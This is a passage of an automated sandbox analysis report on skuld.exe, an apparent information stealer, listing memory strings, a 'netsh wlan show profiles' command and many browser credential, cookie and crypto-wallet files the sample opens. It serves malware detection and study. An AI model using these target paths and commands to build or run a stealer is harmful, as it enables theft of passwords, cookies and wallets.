                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparseSHA-1sse41sse42ssse3matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: %s profiles/invitesBytecoinEthereumElectrum%s\%s\%sCoinbaseCrocobitMetamaskStarcoinProgramsapp.asarGoStringFullPathno anodeCancelIoReadFileAcceptExWSAIoctlshutdownfile[%d]usernameicon_url%s:%d:%sbad instomitzerokernel32hijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflict48828125infinitystrconv.parsing ParseIntcompressEqualSidSetEventIsWindowrecvfromnil PoolscavengepollDescsynctesttraceBufdeadlockraceFinipanicnilcgocheckrunnablerax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes wsaioctlThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqinetedns0[::1]:53continue_gatewayinvalid address readfromunixgram
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: invalid escape sequenceunsupported certificateno application protocolech accept confirmationCLIENT_TRAFFIC_SECRET_0SERVER_TRAFFIC_SECRET_0QUICEncryptionLevel(%v)varint integer overflowexit hook invoked panicpattern bits too long: too many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classflate: internal error: invalid PrintableStringx509: malformed UTCTimex509: invalid key usagex509: malformed versionVariantTimeToSystemTimeSafeArrayCreateVectorExEd25519 sign and verifyed25519: bad public keyP224 point not on curveP256 point not on curveP384 point not on curveP521 point not on curveinvalid scalar encodingGetWindowThreadProcessId-EnableNetworkProtection\Coinomi\Coinomi\walletsfloating point exceptionconnection reset by peerlevel 2 not synchronizedlink number out of rangeout of streams resourcesfunction not implementedstructure needs cleaningnot supported by windowsCertFreeCertificateChainCreateToolhelp32SnapshotGetUserProfileDirectoryWGetProcessImageFileNameWexec: Stdout already setskuld - made by hackirbyjson: unsupported type: RegisterClipboardFormatAinvalid argument to Intnunexpected buffer len=%vinvalid pseudo-header %qframe_headers_prio_shortinvalid request :path %qread_frame_conn_error_%sapplication/octet-streamRequest Entity Too Largehttp: nil Request.Header116415321826934814453125582076609134674072265625AllocateAndInitializeSidBuildSecurityDescriptorWAssignProcessToJobObjectGenerateConsoleCtrlEventGetMaximumProcessorCountGetNamedPipeHandleStateWSetConsoleCursorPositionSetDefaultDllDirectoriesNtQuerySystemInformationSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDevicetracecheckstackownershiphash of unhashable type span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavailable
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\keystore%s\extensions-tempreflect.Value.UintGetExitCodeProcesssegmentation faultoperation canceledno child processesconnection refusedRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFileMappingWGetFileAttributesWSetFileAttributesWCommandLineToArgvWunknown _txlock %qnon-minimal lengthtruncated sequencesequence truncatedcannot be negativeexceeded max depthinvalid character in numeric literalcontext.Backgroundunsupported formatbufio: buffer fullhttp: blank cookiereceived from peerFLOW_CONTROL_ERRORframe_goaway_shortproxy-authenticateUNKNOWN_SETTING_%dGo-http-client/2.0Go-http-client/1.1Temporary RedirectPermanent RedirectMethod Not AllowedExpectation Failedbad Content-Lengthfield value for %qIBM Code Page 1047IBM Code Page 1140Macintosh Cyrillicvalue out of range298023223876953125GetPerformanceInfoCM_MapCrToWin32ErrCloseServiceHandleCreateWellKnownSidGetSidSubAuthorityMakeSelfRelativeSDQueryServiceStatusCertGetNameStringWPFXImportCertStoreGetBestInterfaceExClosePseudoConsoleEscapeCommFunctionGetCommModemStatusGetComputerNameExWGetCurrentThreadIdGetModuleFileNameWGetModuleHandleExWGetVolumePathNameWRemoveDllDirectoryTerminateJobObjectWriteProcessMemoryEnumProcessModulesGetModuleBaseNameWreflect.Value.Elemreflect.Value.Typereflect: Zero(nil)adaptivestackstartdontfreezetheworldtraceadvanceperiodtracebackancestorsgarbage collectionsync.RWMutex.RLockGC worker (active)stopping the worldwait until GC endsbad lfnode addresssystem page size ( but memory size /gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preempt
                        Tries to harvest and steal WLAN passwords
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiiooljJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\ls-archive.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiiiJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\eventsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmaloJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\tmpJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\favicons.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfkJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chromeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\minidumpsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\gmacpqja.defaultJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\gleanJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\key4.dbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.filesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbhJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\webappsstore.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgoJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgogJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmjJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareportingJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\protections.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfkJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\permissions.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkibJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.filesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\pending_pingsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\temporaryJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\logins.jsonJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\to-be-removedJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\favicons.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\security_stateJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\places.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storageJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\archivedJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanentJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\places.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\crashesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjcaJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\favicons.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\dbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\defaultJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jblndlipeogpafnldhgmapagcccfchpiJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\bookmarkbackupsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-releaseJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofoJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\webappsstore.sqlite-shmJump to behavior
